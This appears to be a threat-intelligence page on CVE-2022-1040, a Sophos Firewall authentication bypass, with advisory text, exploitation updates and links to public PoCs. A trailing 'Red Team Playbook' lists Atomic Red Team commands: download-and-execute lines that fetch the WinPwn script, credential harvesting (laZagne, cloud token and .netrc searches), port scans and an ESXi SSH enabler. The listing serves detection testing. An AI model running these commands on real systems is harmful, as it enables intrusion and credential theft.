CVE-2022-1040
Overview
This vulnerability is an authentication bypass in the Sophos Firewall User Portal and Webadmin interfaces. The root cause lies in improper validation of authentication tokens or session state, allowing unauthenticated requests to access privileged functionality. This flaw affects Sophos Firewall software versions 18.5 MR3 and earlier, specifically targeting the authentication mechanisms of the web management components.
Vulnerability Description
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
Impact
An attacker can remotely execute arbitrary code on the firewall without any authentication or user interaction, gaining full control over the device. This enables compromise of firewall configurations, interception or manipulation of network traffic, and potential lateral movement within the protected network. The vulnerability effectively allows complete system compromise of affected Sophos Firewall deployments, threatening enterprise network security and data confidentiality.
Solution
Sophos has released security updates addressing this issue in versions later than 18.5 MR3. Administrators should apply the latest patches as detailed in the Sophos Security Advisory available at https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce. No official workarounds are provided; immediate upgrading to the fixed version is recommended to mitigate exploitation risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The authentication bypass vulnerability in Sophos Firewall versions v18.5 MR3 and earlier presents a significant risk to network security. This flaw allows remote attackers to bypass authentication mechanisms, enabling them to execute arbitrary code on the affected systems. The underlying issue stems from improper validation of user input, which can be exploited to gain unauthorized access to the User Portal and Webadmin interfaces. Once an attacker successfully bypasses authentication, they can manipulate firewall settings, access sensitive data, and potentially compromise the entire network infrastructure.
Attack vectors for this vulnerability are varied, with the most straightforward being direct exploitation via the User Portal or Webadmin interfaces. An attacker could leverage automated tools or scripts to send crafted requests that exploit the authentication bypass. Given that these interfaces are often exposed to the internet, the attack surface is significantly broadened, allowing malicious actors to target organizations without prior access. Additionally, exploitation could be combined with social engineering tactics to increase the likelihood of success, such as phishing campaigns aimed at network administrators.
The real-world impact of this vulnerability can be profound, especially for organizations relying on Sophos Firewall for their network security. Successful exploitation could lead to unauthorized access to critical systems, data breaches, and the potential for lateral movement within the network. The business risks associated with such incidents include financial losses, reputational damage, and regulatory penalties, particularly for organizations handling sensitive customer information. The high CVSS score of 9.8 indicates that this vulnerability is not only critical but also requires immediate attention from affected organizations to mitigate potential fallout.
To detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected systems, upgrading to the latest versions of Sophos Firewall that address this flaw. Regular vulnerability assessments and penetration testing should be conducted to identify any potential weaknesses in the network infrastructure. Additionally, implementing robust access controls, such as multi-factor authentication, can help reduce the risk of unauthorized access. Monitoring logs for unusual activity related to the User Portal and Webadmin can also aid in early detection of attempted exploitation, allowing organizations to respond swiftly to potential threats.
In conclusion, the authentication bypass vulnerability in Sophos Firewall represents a critical threat that necessitates urgent action from organizations utilizing this product. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare their defenses. Proactive measures, including timely patching, enhanced security protocols, and vigilant monitoring, are essential to safeguard against the risks posed by this vulnerability and to maintain the integrity of network security.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the authentication bypass vulnerability in Sophos Firewall. Our telemetry indicates a sharp increase in detection activity, accompanied by a rising Exploit Prediction Scoring System (EPSS) value, now approaching certainty of exploitation. This trend is further underscored by the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, lowering the barrier for threat actors to weaponize this vulnerability. Although ransomware usage linked to this flaw remains unconfirmed, the expanding exploit toolkit and heightened detection frequency suggest an elevated risk of opportunistic intrusions and potential lateral movement within compromised networks. Consequently, the threat landscape for CVE-2022-1040 has intensified, warranting heightened vigilance as adversaries gain easier access to firewall management interfaces, which could lead to severe operational disruptions and data breaches.
Update 2 — July 30, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-1040, with our telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge coincides with the continued proliferation of publicly available proof-of-concept exploits on multiple code-sharing platforms, which lowers the technical barrier for adversaries to weaponize this critical authentication bypass vulnerability in Sophos Firewall. While ransomware deployment linked to this vulnerability remains unconfirmed, the increased exploitation activity heightens the risk of unauthorized remote code execution and subsequent network compromise. For defenders, this trend underscores an urgent need to prioritize monitoring and response efforts around firewall management interfaces, as attackers are increasingly leveraging these exploits to gain persistent footholds. The elevated exploitation pressure effectively raises the threat level from critical to actively exploited, signaling a transition from theoretical risk to tangible operational impact within affected environments.
Update 3 — August 17, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2022-1040, with telemetry indicating a doubling in observed activity over recent monitoring periods. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, lowering the barrier for adversaries to weaponize this critical authentication bypass vulnerability. Although ransomware involvement remains unconfirmed, the increased exploitation frequency significantly elevates the likelihood of unauthorized remote code execution within affected Sophos Firewall environments. For defenders, this intensification signals an urgent need to enhance vigilance around firewall management interfaces, as attackers are rapidly capitalizing on these vulnerabilities to establish persistent access. Consequently, the threat level for CVE-2022-1040 has shifted from critical to actively exploited, reflecting a transition from theoretical risk to confirmed operational impact that demands prioritized attention in network defense strategies.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sophos | Sfos | All |
cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass | Aryan Chehreghani | webapps | hardware | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jam620/Sophos-Vulnerability
CVE-2022-1040
|
jam620 | 18 | 5 | 2022-09-25 | View |
|
killvxk/CVE-2022-1040
may the poc with you
|
killvxk | 16 | 2 | 2022-05-06 | View |
|
jackson5sec/CVE-2022-1040
This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authenti...
|
jackson5sec | 2 | 3 | 2022-10-30 | View |
|
Keith-amateur/cve-2022-1040
Save the trouble to open the burpsuite...
|
Keith-amateur | 3 | 0 | 2022-10-07 | View |
|
Cyb3rEnthusiast/CVE-2022-1040
New exploitation of 2020 Sophos vuln
|
Cyb3rEnthusiast | 1 | 0 | 2023-09-26 | View |
|
michealadams30/CVE-2022-1040
Sophos EXploit
|
michealadams30 | 0 | 1 | 2023-01-08 | View |
|
xMr110/CVE-2022-1040
|
xMr110 | 0 | 0 | 2024-02-05 | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-1040 |
| sophos.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/168046/Sophos-XG115w-Firewall-17.0.10-MR-10-Authentication-Bypass.html |
| exploit-db.com |
GitHub CVE
x_refsource_MISC
|
https://www.exploit-db.com/exploits/51006 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-1040 |